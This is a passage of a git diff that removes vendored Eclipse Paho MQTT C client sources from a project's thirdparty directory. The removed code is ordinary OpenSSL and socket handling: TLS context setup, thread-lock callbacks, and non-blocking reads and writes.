-	rc = 0;
-
-	return rc;
-}
-
-void SSL_destroy_mutex(ssl_mutex_type* mutex)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	rc = CloseHandle(*mutex);
-#else
-	rc = pthread_mutex_destroy(mutex);
-#endif
-	FUNC_EXIT_RC(rc);
-}
-
-
-
-#if (OPENSSL_VERSION_NUMBER >= 0x010000000)
-extern void SSLThread_id(CRYPTO_THREADID *id)
-{
-#if defined(WIN32) || defined(WIN64)
-	CRYPTO_THREADID_set_numeric(id, (unsigned long)GetCurrentThreadId());
-#else
-	CRYPTO_THREADID_set_numeric(id, (unsigned long)pthread_self());
-#endif
-}
-#else
-extern unsigned long SSLThread_id(void)
-{
-#if defined(WIN32) || defined(WIN64)
-	return (unsigned long)GetCurrentThreadId();
-#else
-	return (unsigned long)pthread_self();
-#endif
-}
-#endif
-
-extern void SSLLocks_callback(int mode, int n, const char *file, int line)
-{
-	if (sslLocks)
-	{
-		if (mode & CRYPTO_LOCK)
-			SSL_lock_mutex(&sslLocks[n]);
-		else
-			SSL_unlock_mutex(&sslLocks[n]);
-	}
-}
-
-
-void SSLSocket_handleOpensslInit(int bool_value)
-{
-	handle_openssl_init = bool_value;
-}
-
-
-int SSLSocket_initialize(void)
-{
-	int rc = 0;
-	/*int prc;*/
-	int i;
-	int lockMemSize;
-	
-	FUNC_ENTRY;
-
-	if (handle_openssl_init)
-	{
-		if ((rc = SSL_library_init()) != 1)
-			rc = -1;
-			
-		ERR_load_crypto_strings();
-		SSL_load_error_strings();
-		
-		/* OpenSSL 0.9.8o and 1.0.0a and later added SHA2 algorithms to SSL_library_init(). 
-		Applications which need to use SHA2 in earlier versions of OpenSSL should call 
-		OpenSSL_add_all_algorithms() as well. */
-		
-		OpenSSL_add_all_algorithms();
-		
-		lockMemSize = CRYPTO_num_locks() * sizeof(ssl_mutex_type);
-
-		sslLocks = malloc(lockMemSize);
-		if (!sslLocks)
-		{
-			rc = -1;
-			goto exit;
-		}
-		else
-			memset(sslLocks, 0, lockMemSize);
-
-		for (i = 0; i < CRYPTO_num_locks(); i++)
-		{
-			/* prc = */SSL_create_mutex(&sslLocks[i]);
-		}
-
-#if (OPENSSL_VERSION_NUMBER >= 0x010000000)
-		CRYPTO_THREADID_set_callback(SSLThread_id);
-#else
-		CRYPTO_set_id_callback(SSLThread_id);
-#endif
-		CRYPTO_set_locking_callback(SSLLocks_callback);
-		
-	}
-	
-	SSL_create_mutex(&sslCoreMutex);
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-void SSLSocket_terminate(void)
-{
-	FUNC_ENTRY;
-	
-	if (handle_openssl_init)
-	{
-		EVP_cleanup();
-		ERR_free_strings();
-		CRYPTO_set_locking_callback(NULL);
-		if (sslLocks)
-		{
-			int i = 0;
-
-			for (i = 0; i < CRYPTO_num_locks(); i++)
-			{
-				SSL_destroy_mutex(&sslLocks[i]);
-			}
-			free(sslLocks);
-		}
-	}
-	
-	SSL_destroy_mutex(&sslCoreMutex);
-	
-	FUNC_EXIT;
-}
-
-int SSLSocket_createContext(networkHandles* net, MQTTClient_SSLOptions* opts)
-{
-	int rc = 1;
-	const char* ciphers = NULL;
-	
-	FUNC_ENTRY;
-	if (net->ctx == NULL)
-	{
-		int sslVersion = MQTT_SSL_VERSION_DEFAULT;
-		if (opts->struct_version >= 1) sslVersion = opts->sslVersion;
-/* SSL_OP_NO_TLSv1_1 is defined in ssl.h if the library version supports TLSv1.1.
- * OPENSSL_NO_TLS1 is defined in opensslconf.h or on the compiler command line
- * if TLS1.x was removed at OpenSSL library build time via Configure options.
- */
-		switch (sslVersion)
-		{
-		case MQTT_SSL_VERSION_DEFAULT:
-			net->ctx = SSL_CTX_new(SSLv23_client_method()); /* SSLv23 for compatibility with SSLv2, SSLv3 and TLSv1 */
-			break;
-#if defined(SSL_OP_NO_TLSv1) && !defined(OPENSSL_NO_TLS1)
-		case MQTT_SSL_VERSION_TLS_1_0:
-			net->ctx = SSL_CTX_new(TLSv1_client_method());
-			break;
-#endif
-#if defined(SSL_OP_NO_TLSv1_1) && !defined(OPENSSL_NO_TLS1)
-		case MQTT_SSL_VERSION_TLS_1_1:
-			net->ctx = SSL_CTX_new(TLSv1_1_client_method());
-			break;
-#endif
-#if defined(SSL_OP_NO_TLSv1_2) && !defined(OPENSSL_NO_TLS1)
-		case MQTT_SSL_VERSION_TLS_1_2:
-			net->ctx = SSL_CTX_new(TLSv1_2_client_method());
-			break;
-#endif
-		default:
-			break;
-		}
-		if (net->ctx == NULL)
-		{
-			SSLSocket_error("SSL_CTX_new", NULL, net->socket, rc);
-			goto exit;
-		}
-	}
-	
-	if (opts->keyStore)
-	{
-		if ((rc = SSL_CTX_use_certificate_chain_file(net->ctx, opts->keyStore)) != 1)
-		{
-			SSLSocket_error("SSL_CTX_use_certificate_chain_file", NULL, net->socket, rc);
-			goto free_ctx; /*If we can't load the certificate (chain) file then loading the privatekey won't work either as it needs a matching cert already loaded */
-		}	
-			
-		if (opts->privateKey == NULL)
-			opts->privateKey = opts->keyStore;   /* the privateKey can be included in the keyStore */
-
-		if (opts->privateKeyPassword != NULL)
-		{
-			SSL_CTX_set_default_passwd_cb(net->ctx, pem_passwd_cb);
-			SSL_CTX_set_default_passwd_cb_userdata(net->ctx, (void*)opts->privateKeyPassword);
-		}
-		
-		/* support for ASN.1 == DER format? DER can contain only one certificate? */
-		rc = SSL_CTX_use_PrivateKey_file(net->ctx, opts->privateKey, SSL_FILETYPE_PEM);
-		if (opts->privateKey == opts->keyStore)
-			opts->privateKey = NULL;
-		if (rc != 1)
-		{
-			SSLSocket_error("SSL_CTX_use_PrivateKey_file", NULL, net->socket, rc);
-			goto free_ctx;
-		}  
-	}
-
-	if (opts->trustStore)
-	{
-		if ((rc = SSL_CTX_load_verify_locations(net->ctx, opts->trustStore, NULL)) != 1)
-		{
-			SSLSocket_error("SSL_CTX_load_verify_locations", NULL, net->socket, rc);
-			goto free_ctx;
-		}                               
-	}
-	else if ((rc = SSL_CTX_set_default_verify_paths(net->ctx)) != 1)
-	{
-		SSLSocket_error("SSL_CTX_set_default_verify_paths", NULL, net->socket, rc);
-		goto free_ctx;
-	}
-
-	if (opts->enabledCipherSuites == NULL)
-		ciphers = "DEFAULT"; 
-	else
-		ciphers = opts->enabledCipherSuites;
-
-	if ((rc = SSL_CTX_set_cipher_list(net->ctx, ciphers)) != 1)
-	{
-		SSLSocket_error("SSL_CTX_set_cipher_list", NULL, net->socket, rc);
-		goto free_ctx;
-	}       
-	
-	SSL_CTX_set_mode(net->ctx, SSL_MODE_ACCEPT_MOVING_WRITE_BUFFER);
-
-	goto exit;
-free_ctx:
-	SSL_CTX_free(net->ctx);
-	net->ctx = NULL;
-	
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int SSLSocket_setSocketForSSL(networkHandles* net, MQTTClient_SSLOptions* opts, char* hostname)
-{
-	int rc = 1;
-	
-	FUNC_ENTRY;
-	
-	if (net->ctx != NULL || (rc = SSLSocket_createContext(net, opts)) == 1)
-	{
-		int i;
-
-		SSL_CTX_set_info_callback(net->ctx, SSL_CTX_info_callback);
-		SSL_CTX_set_msg_callback(net->ctx, SSL_CTX_msg_callback);
-   		if (opts->enableServerCertAuth) 
-			SSL_CTX_set_verify(net->ctx, SSL_VERIFY_PEER, NULL);
-	
-		net->ssl = SSL_new(net->ctx);
-
-		/* Log all ciphers available to the SSL sessions (loaded in ctx) */
-		for (i = 0; ;i++)
-		{
-			const char* cipher = SSL_get_cipher_list(net->ssl, i);
-			if (cipher == NULL)
-				break;
-			Log(TRACE_PROTOCOL, 1, "SSL cipher available: %d:%s", i, cipher);
-	    	}	
-		if ((rc = SSL_set_fd(net->ssl, net->socket)) != 1)
-			SSLSocket_error("SSL_set_fd", net->ssl, net->socket, rc);
-
-		if ((rc = SSL_set_tlsext_host_name(net->ssl, hostname)) != 1)
-			SSLSocket_error("SSL_set_tlsext_host_name", NULL, net->socket, rc);
-	}
-		
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int SSLSocket_connect(SSL* ssl, int sock)      
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-
-	rc = SSL_connect(ssl);
-	if (rc != 1)
-	{
-		int error;
-		error = SSLSocket_error("SSL_connect", ssl, sock, rc);
-		if (error == SSL_FATAL)
-			rc = error;
-		if (error == SSL_ERROR_WANT_READ || error == SSL_ERROR_WANT_WRITE)
-			rc = TCPSOCKET_INTERRUPTED;
-	}
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-/**
- *  Reads one byte from a socket
- *  @param socket the socket to read from
- *  @param c the character read, returned
- *  @return completion code
- */
-int SSLSocket_getch(SSL* ssl, int socket, char* c)
-{
-	int rc = SOCKET_ERROR;
-
-	FUNC_ENTRY;
-	if ((rc = SocketBuffer_getQueuedChar(socket, c)) != SOCKETBUFFER_INTERRUPTED)
-		goto exit;
-
-	if ((rc = SSL_read(ssl, c, (size_t)1)) < 0)
-	{
-		int err = SSLSocket_error("SSL_read - getch", ssl, socket, rc);
-		if (err == SSL_ERROR_WANT_READ || err == SSL_ERROR_WANT_WRITE)
-		{
-			rc = TCPSOCKET_INTERRUPTED;
-			SocketBuffer_interrupted(socket, 0);
-		}
-	}
-	else if (rc == 0)
-		rc = SOCKET_ERROR; 	/* The return value from recv is 0 when the peer has performed an orderly shutdown. */
-	else if (rc == 1)
-	{
-		SocketBuffer_queueChar(socket, *c);
-		rc = TCPSOCKET_COMPLETE;
-	}
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-/**
- *  Attempts to read a number of bytes from a socket, non-blocking. If a previous read did not
- *  finish, then retrieve that data.
- *  @param socket the socket to read from
- *  @param bytes the number of bytes to read
- *  @param actual_len the actual number of bytes read
- *  @return completion code
- */
-char *SSLSocket_getdata(SSL* ssl, int socket, size_t bytes, size_t* actual_len)
-{
-	int rc;
-	char* buf;
-
-	FUNC_ENTRY;
-	if (bytes == 0)
-	{
-		buf = SocketBuffer_complete(socket);
-		goto exit;
-	}
-
-	buf = SocketBuffer_getQueuedData(socket, bytes, actual_len);
-
-	if ((rc = SSL_read(ssl, buf + (*actual_len), (int)(bytes - (*actual_len)))) < 0)
-	{
-		rc = SSLSocket_error("SSL_read - getdata", ssl, socket, rc);
-		if (rc != SSL_ERROR_WANT_READ && rc != SSL_ERROR_WANT_WRITE)
-		{
-			buf = NULL;
-			goto exit;
-		}
-	}
-	else if (rc == 0) /* rc 0 means the other end closed the socket */
-	{
-		buf = NULL;
-		goto exit;
-	}
-	else
-		*actual_len += rc;
-
-	if (*actual_len == bytes)
-	{
-		SocketBuffer_complete(socket);
-		/* if we read the whole packet, there might still be data waiting in the SSL buffer, which
-		isn't picked up by select.  So here we should check for any data remaining in the SSL buffer, and
-		if so, add this socket to a new "pending SSL reads" list.
-		*/
-		if (SSL_pending(ssl) > 0) /* return no of bytes pending */
-			SSLSocket_addPendingRead(socket);
-	}
-	else /* we didn't read the whole packet */
-	{
-		SocketBuffer_interrupted(socket, *actual_len);
-		Log(TRACE_MAX, -1, "SSL_read: %d bytes expected but %d bytes now received", bytes, *actual_len);
-	}
-exit:
-	FUNC_EXIT;
-	return buf;
-}
-
-void SSLSocket_destroyContext(networkHandles* net)
-{
-	FUNC_ENTRY;
-	if (net->ctx)
-		SSL_CTX_free(net->ctx);
-	net->ctx = NULL;
-	FUNC_EXIT;
-}
-
-
-int SSLSocket_close(networkHandles* net)
-{
-	int rc = 1;
-	FUNC_ENTRY;
-	if (net->ssl) {
-		rc = SSL_shutdown(net->ssl);
-		SSL_free(net->ssl);
-		net->ssl = NULL;
-	}
-	SSLSocket_destroyContext(net);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/* No SSL_writev() provided by OpenSSL. Boo. */  
-int SSLSocket_putdatas(SSL* ssl, int socket, char* buf0, size_t buf0len, int count, char** buffers, size_t* buflens, int* frees)
-{
-	int rc = 0;
-	int i;
-	char *ptr;
-	iobuf iovec;
-	int sslerror;
-
-	FUNC_ENTRY;
-	iovec.iov_len = (ULONG)buf0len;
-	for (i = 0; i < count; i++)
-		iovec.iov_len += (ULONG)buflens[i];
-
-	ptr = iovec.iov_base = (char *)malloc(iovec.iov_len);  
-	memcpy(ptr, buf0, buf0len);
-	ptr += buf0len;
-	for (i = 0; i < count; i++)
-	{
-		memcpy(ptr, buffers[i], buflens[i]);
-		ptr += buflens[i];
-	}
-
-	SSL_lock_mutex(&sslCoreMutex);
-	if ((rc = SSL_write(ssl, iovec.iov_base, iovec.iov_len)) == iovec.iov_len)
-		rc = TCPSOCKET_COMPLETE;
-	else 
-	{ 
-		sslerror = SSLSocket_error("SSL_write", ssl, socket, rc);
-		
-		if (sslerror == SSL_ERROR_WANT_WRITE)
-		{
-			int* sockmem = (int*)malloc(sizeof(int));
-			int free = 1;
-
-			Log(TRACE_MIN, -1, "Partial write: incomplete write of %d bytes on SSL socket %d",
-				iovec.iov_len, socket);
-			SocketBuffer_pendingWrite(socket, ssl, 1, &iovec, &free, iovec.iov_len, 0);
-			*sockmem = socket;
-			ListAppend(s.write_pending, sockmem, sizeof(int));
-			FD_SET(socket, &(s.pending_wset));
-			rc = TCPSOCKET_INTERRUPTED;
-		}
-		else 
-			rc = SOCKET_ERROR;
-	}
-	SSL_unlock_mutex(&sslCoreMutex);
-
-	if (rc != TCPSOCKET_INTERRUPTED)
-		free(iovec.iov_base);
-	else
-	{
-		int i;
-		free(buf0);
-		for (i = 0; i < count; ++i)
-		{
-			if (frees[i])
-				free(buffers[i]);
-		}	
-	}
-	FUNC_EXIT_RC(rc); 
-	return rc;
-}
-
-static List pending_reads = {NULL, NULL, NULL, 0, 0};
-
-void SSLSocket_addPendingRead(int sock)
-{
-	FUNC_ENTRY;
-	if (ListFindItem(&pending_reads, &sock, intcompare) == NULL) /* make sure we don't add the same socket twice */
-	{
-		int* psock = (int*)malloc(sizeof(sock));
-		*psock = sock;
-		ListAppend(&pending_reads, psock, sizeof(sock));
-	}
-	else
-		Log(TRACE_MIN, -1, "SSLSocket_addPendingRead: socket %d already in the list", sock);
-
-	FUNC_EXIT;
-}
-
-
-int SSLSocket_getPendingRead(void)
-{
-	int sock = -1;
-	
-	if (pending_reads.count > 0)
-	{
-		sock = *(int*)(pending_reads.first->content);
-		ListRemoveHead(&pending_reads);
-	}
-	return sock;
-}
-
-
-int SSLSocket_continueWrite(pending_writes* pw)
-{
-	int rc = 0; 
-	
-	FUNC_ENTRY;
-	if ((rc = SSL_write(pw->ssl, pw->iovecs[0].iov_base, pw->iovecs[0].iov_len)) == pw->iovecs[0].iov_len)
-	{
-		/* topic and payload buffers are freed elsewhere, when all references to them have been removed */
-		free(pw->iovecs[0].iov_base);
-		Log(TRACE_MIN, -1, "SSL continueWrite: partial write now complete for socket %d", pw->socket);
-		rc = 1;
-	}
-	else
-	{
-		int sslerror = SSLSocket_error("SSL_write", pw->ssl, pw->socket, rc);
-		if (sslerror == SSL_ERROR_WANT_WRITE)
-			rc = 0; /* indicate we haven't finished writing the payload yet */
-	}
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/SSLSocket.h b/thirdparty/paho.mqtt.c/src/SSLSocket.h
deleted file mode 100644
index ca18f62..0000000
--- a/thirdparty/paho.mqtt.c/src/SSLSocket.h
+++ /dev/null
@@ -1,51 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs, Allan Stockdill-Mander - initial implementation 
- *    Ian Craggs - SNI support
- *******************************************************************************/
-#if !defined(SSLSOCKET_H)
-#define SSLSOCKET_H
-
-#if defined(WIN32) || defined(WIN64)
-	#define ssl_mutex_type HANDLE
-#else
-	#include <pthread.h>
-	#include <semaphore.h>
-	#define ssl_mutex_type pthread_mutex_t
-#endif
-
-#include <openssl/ssl.h>
-#include "SocketBuffer.h"
-#include "Clients.h"
-
-#define URI_SSL "ssl://"
-
-/** if we should handle openssl initialization (bool_value == 1) or depend on it to be initalized externally (bool_value == 0) */
-void SSLSocket_handleOpensslInit(int bool_value);
-
-int SSLSocket_initialize(void);
-void SSLSocket_terminate(void);
-int SSLSocket_setSocketForSSL(networkHandles* net, MQTTClient_SSLOptions* opts, char* hostname);
-
-int SSLSocket_getch(SSL* ssl, int socket, char* c);
-char *SSLSocket_getdata(SSL* ssl, int socket, size_t bytes, size_t* actual_len);
-
-int SSLSocket_close(networkHandles* net);
-int SSLSocket_putdatas(SSL* ssl, int socket, char* buf0, size_t buf0len, int count, char** buffers, size_t* buflens, int* frees);
-int SSLSocket_connect(SSL* ssl, int socket);
-
-int SSLSocket_getPendingRead(void);
-int SSLSocket_continueWrite(pending_writes* pw);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/Socket.c b/thirdparty/paho.mqtt.c/src/Socket.c
deleted file mode 100644
index 939dbab..0000000
--- a/thirdparty/paho.mqtt.c/src/Socket.c
+++ /dev/null
@@ -1,898 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial implementation and documentation
- *    Ian Craggs - async client updates
- *    Ian Craggs - fix for bug 484496
- *    Juergen Kosel, Ian Craggs - fix for issue #135
- *    Ian Craggs - issue #217
- *    Ian Craggs - fix for issue #186
- *******************************************************************************/
-
-/**
- * @file
- * \brief Socket related functions
- *
- * Some other related functions are in the SocketBuffer module
- */
-
-
-#include "Socket.h"
-#include "Log.h"
-#include "SocketBuffer.h"
-#include "Messages.h"
-#include "StackTrace.h"
-#if defined(OPENSSL)
-#include "SSLSocket.h"
-#endif
-
-#include <stdlib.h>
-#include <string.h>
-#include <signal.h>
-#include <ctype.h>
-
-#include "Heap.h"
-
-int Socket_setnonblocking(int sock);
-int Socket_error(char* aString, int sock);
-int Socket_addSocket(int newSd);
-int isReady(int socket, fd_set* read_set, fd_set* write_set);
-int Socket_writev(int socket, iobuf* iovecs, int count, unsigned long* bytes);
-int Socket_close_only(int socket);
-int Socket_continueWrite(int socket);
-int Socket_continueWrites(fd_set* pwset);
-char* Socket_getaddrname(struct sockaddr* sa, int sock);
-
-#if defined(WIN32) || defined(WIN64)
-#define iov_len len
-#define iov_base buf
-#endif
-
-/**
- * Structure to hold all socket data for the module
- */
-Sockets s;
-static fd_set wset;
-
-/**
- * Set a socket non-blocking, OS independently
- * @param sock the socket to set non-blocking
- * @return TCP call error code
- */
-int Socket_setnonblocking(int sock)
-{
-	int rc;
-#if defined(WIN32) || defined(WIN64)
-	u_long flag = 1L;
-
-	FUNC_ENTRY;
-	rc = ioctl(sock, FIONBIO, &flag);
-#else
-	int flags;
-
-	FUNC_ENTRY;
-	if ((flags = fcntl(sock, F_GETFL, 0)))
-		flags = 0;
-	rc = fcntl(sock, F_SETFL, flags | O_NONBLOCK);
-#endif
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Gets the specific error corresponding to SOCKET_ERROR
- * @param aString the function that was being used when the error occurred
- * @param sock the socket on which the error occurred
- * @return the specific TCP error code
- */
-int Socket_error(char* aString, int sock)
-{
-#if defined(WIN32) || defined(WIN64)
-	int errno;
-#endif
-
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	errno = WSAGetLastError();
-#endif
-	if (errno != EINTR && errno != EAGAIN && errno != EINPROGRESS && errno != EWOULDBLOCK)
-	{
-		if (strcmp(aString, "shutdown") != 0 || (errno != ENOTCONN && errno != ECONNRESET))
-			Log(TRACE_MINIMUM, -1, "Socket error %s(%d) in %s for socket %d", strerror(errno), errno, aString, sock);
-	}
-	FUNC_EXIT_RC(errno);
-	return errno;
-}
-
-
-/**
- * Initialize the socket module
- */
-void Socket_outInitialize(void)
-{
-#if defined(WIN32) || defined(WIN64)
-	WORD    winsockVer = 0x0202;
-	WSADATA wsd;
-
-	FUNC_ENTRY;
-	WSAStartup(winsockVer, &wsd);
-#else
-	FUNC_ENTRY;
-	signal(SIGPIPE, SIG_IGN);
-#endif
-
-	SocketBuffer_initialize();
-	s.clientsds = ListInitialize();
-	s.connect_pending = ListInitialize();
-	s.write_pending = ListInitialize();
-	s.cur_clientsds = NULL;
-	FD_ZERO(&(s.rset));														/* Initialize the descriptor set */
-	FD_ZERO(&(s.pending_wset));
-	s.maxfdp1 = 0;
-	memcpy((void*)&(s.rset_saved), (void*)&(s.rset), sizeof(s.rset_saved));
-	FUNC_EXIT;
-}
-
-
-/**
- * Terminate the socket module
- */
-void Socket_outTerminate(void)
-{
-	FUNC_ENTRY;
-	ListFree(s.connect_pending);
-	ListFree(s.write_pending);
-	ListFree(s.clientsds);
-	SocketBuffer_terminate();
-#if defined(WIN32) || defined(WIN64)
-	WSACleanup();
-#endif
-	FUNC_EXIT;
-}
-
-
-/**
- * Add a socket to the list of socket to check with select
- * @param newSd the new socket to add
- */
-int Socket_addSocket(int newSd)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (ListFindItem(s.clientsds, &newSd, intcompare) == NULL) /* make sure we don't add the same socket twice */
-	{
-		if (s.clientsds->count >= FD_SETSIZE)
-		{
-			Log(LOG_ERROR, -1, "addSocket: exceeded FD_SETSIZE %d", FD_SETSIZE);
-			rc = SOCKET_ERROR;
-		}
-		else
-		{
-			int* pnewSd = (int*)malloc(sizeof(newSd));
-			*pnewSd = newSd;
-			ListAppend(s.clientsds, pnewSd, sizeof(newSd));
-			FD_SET(newSd, &(s.rset_saved));
-			s.maxfdp1 = max(s.maxfdp1, newSd + 1);
-			rc = Socket_setnonblocking(newSd);
-			if (rc == SOCKET_ERROR)
-				Log(LOG_ERROR, -1, "addSocket: setnonblocking");
-		}
-	}
-	else
-		Log(LOG_ERROR, -1, "addSocket: socket %d already in the list", newSd);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Don't accept work from a client unless it is accepting work back, i.e. its socket is writeable
- * this seems like a reasonable form of flow control, and practically, seems to work.
- * @param socket the socket to check
- * @param read_set the socket read set (see select doc)
- * @param write_set the socket write set (see select doc)
- * @return boolean - is the socket ready to go?
- */
-int isReady(int socket, fd_set* read_set, fd_set* write_set)
-{
-	int rc = 1;
-
-	FUNC_ENTRY;
-	if  (ListFindItem(s.connect_pending, &socket, intcompare) && FD_ISSET(socket, write_set))
-		ListRemoveItem(s.connect_pending, &socket, intcompare);
-	else
-		rc = FD_ISSET(socket, read_set) && FD_ISSET(socket, write_set) && Socket_noPendingWrites(socket);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- *  Returns the next socket ready for communications as indicated by select
- *  @param more_work flag to indicate more work is waiting, and thus a timeout value of 0 should
- *  be used for the select
- *  @param tp the timeout to be used for the select, unless overridden
- *  @return the socket next ready, or 0 if none is ready
- */
-int Socket_getReadySocket(int more_work, struct timeval *tp)
-{
-	int rc = 0;
-	static struct timeval zero = {0L, 0L}; /* 0 seconds */
-	static struct timeval one = {1L, 0L}; /* 1 second */
-	struct timeval timeout = one;
-
-	FUNC_ENTRY;
-	if (s.clientsds->count == 0)
-		goto exit;
-
-	if (more_work)
-		timeout = zero;
-	else if (tp)
-		timeout = *tp;
-
-	while (s.cur_clientsds != NULL)
-	{
-		if (isReady(*((int*)(s.cur_clientsds->content)), &(s.rset), &wset))
-			break;
-		ListNextElement(s.clientsds, &s.cur_clientsds);
-	}
-
-	if (s.cur_clientsds == NULL)
-	{
-		int rc1;
-		fd_set pwset;
-
-		memcpy((void*)&(s.rset), (void*)&(s.rset_saved), sizeof(s.rset));
-		memcpy((void*)&(pwset), (void*)&(s.pending_wset), sizeof(pwset));
-		if ((rc = select(s.maxfdp1, &(s.rset), &pwset, NULL, &timeout)) == SOCKET_ERROR)
-		{
-			Socket_error("read select", 0);
-			goto exit;
-		}
-		Log(TRACE_MAX, -1, "Return code %d from read select", rc);
-
-		if (Socket_continueWrites(&pwset) == SOCKET_ERROR)
-		{
-			rc = 0;
-			goto exit;
-		}
-
-		memcpy((void*)&wset, (void*)&(s.rset_saved), sizeof(wset));
-		if ((rc1 = select(s.maxfdp1, NULL, &(wset), NULL, &zero)) == SOCKET_ERROR)
-		{
-			Socket_error("write select", 0);
-			rc = rc1;
-			goto exit;
-		}
-		Log(TRACE_MAX, -1, "Return code %d from write select", rc1);
-
-		if (rc == 0 && rc1 == 0)
-			goto exit; /* no work to do */
-
-		s.cur_clientsds = s.clientsds->first;
-		while (s.cur_clientsds != NULL)
-		{
-			int cursock = *((int*)(s.cur_clientsds->content));
-			if (isReady(cursock, &(s.rset), &wset))
-				break;
-			ListNextElement(s.clientsds, &s.cur_clientsds);
-		}
-	}
-
-	if (s.cur_clientsds == NULL)
-		rc = 0;
-	else
-	{
-		rc = *((int*)(s.cur_clientsds->content));
-		ListNextElement(s.clientsds, &s.cur_clientsds);
-	}
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-} /* end getReadySocket */
-
-
-/**
- *  Reads one byte from a socket
- *  @param socket the socket to read from
- *  @param c the character read, returned
- *  @return completion code
- */
-int Socket_getch(int socket, char* c)
-{
-	int rc = SOCKET_ERROR;
-
-	FUNC_ENTRY;
-	if ((rc = SocketBuffer_getQueuedChar(socket, c)) != SOCKETBUFFER_INTERRUPTED)
-		goto exit;
-
-	if ((rc = recv(socket, c, (size_t)1, 0)) == SOCKET_ERROR)
-	{
-		int err = Socket_error("recv - getch", socket);
-		if (err == EWOULDBLOCK || err == EAGAIN)
-		{
-			rc = TCPSOCKET_INTERRUPTED;
-			SocketBuffer_interrupted(socket, 0);
-		}
-	}
-	else if (rc == 0)
-		rc = SOCKET_ERROR; 	/* The return value from recv is 0 when the peer has performed an orderly shutdown. */
-	else if (rc == 1)
-	{
-		SocketBuffer_queueChar(socket, *c);
-		rc = TCPSOCKET_COMPLETE;
-	}
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- *  Attempts to read a number of bytes from a socket, non-blocking. If a previous read did not
- *  finish, then retrieve that data.
- *  @param socket the socket to read from
- *  @param bytes the number of bytes to read
- *  @param actual_len the actual number of bytes read
- *  @return completion code
- */
-char *Socket_getdata(int socket, size_t bytes, size_t* actual_len)
-{
-	int rc;
-	char* buf;
-
-	FUNC_ENTRY;
-	if (bytes == 0)
-	{
-		buf = SocketBuffer_complete(socket);
-		goto exit;
-	}
-
-	buf = SocketBuffer_getQueuedData(socket, bytes, actual_len);
-
-	if ((rc = recv(socket, buf + (*actual_len), (int)(bytes - (*actual_len)), 0)) == SOCKET_ERROR)
-	{
-		rc = Socket_error("recv - getdata", socket);
-		if (rc != EAGAIN && rc != EWOULDBLOCK)
-		{
-			buf = NULL;
-			goto exit;
-		}
-	}
-	else if (rc == 0) /* rc 0 means the other end closed the socket, albeit "gracefully" */
-	{
-		buf = NULL;
-		goto exit;
-	}
-	else
-		*actual_len += rc;
-
-	if (*actual_len == bytes)
-		SocketBuffer_complete(socket);
-	else /* we didn't read the whole packet */
-	{
-		SocketBuffer_interrupted(socket, *actual_len);
-		Log(TRACE_MAX, -1, "%d bytes expected but %d bytes now received", bytes, *actual_len);
-	}
-exit:
-	FUNC_EXIT;
-	return buf;
-}
-
-
-/**
- *  Indicate whether any data is pending outbound for a socket.
- *  @return boolean - true == data pending.
- */
-int Socket_noPendingWrites(int socket)
-{
-	int cursock = socket;
-	return ListFindItem(s.write_pending, &cursock, intcompare) == NULL;
-}
-
-
-/**
- *  Attempts to write a series of iovec buffers to a socket in *one* system call so that
- *  they are sent as one packet.
- *  @param socket the socket to write to
- *  @param iovecs an array of buffers to write
- *  @param count number of buffers in iovecs
- *  @param bytes number of bytes actually written returned
- *  @return completion code, especially TCPSOCKET_INTERRUPTED
- */
-int Socket_writev(int socket, iobuf* iovecs, int count, unsigned long* bytes)
-{
-	int rc;
-
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	rc = WSASend(socket, iovecs, count, (LPDWORD)bytes, 0, NULL, NULL);
-	if (rc == SOCKET_ERROR)
-	{
-		int err = Socket_error("WSASend - putdatas", socket);
-		if (err == EWOULDBLOCK || err == EAGAIN)
-			rc = TCPSOCKET_INTERRUPTED;
-	}
-#else
-	*bytes = 0L;
-	rc = writev(socket, iovecs, count);
-	if (rc == SOCKET_ERROR)
-	{
-		int err = Socket_error("writev - putdatas", socket);
-		if (err == EWOULDBLOCK || err == EAGAIN)
-			rc = TCPSOCKET_INTERRUPTED;
-	}
-	else
-		*bytes = rc;
-#endif
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- *  Attempts to write a series of buffers to a socket in *one* system call so that they are
- *  sent as one packet.
- *  @param socket the socket to write to
- *  @param buf0 the first buffer
- *  @param buf0len the length of data in the first buffer
- *  @param count number of buffers
- *  @param buffers an array of buffers to write
- *  @param buflens an array of corresponding buffer lengths
- *  @return completion code, especially TCPSOCKET_INTERRUPTED
- */
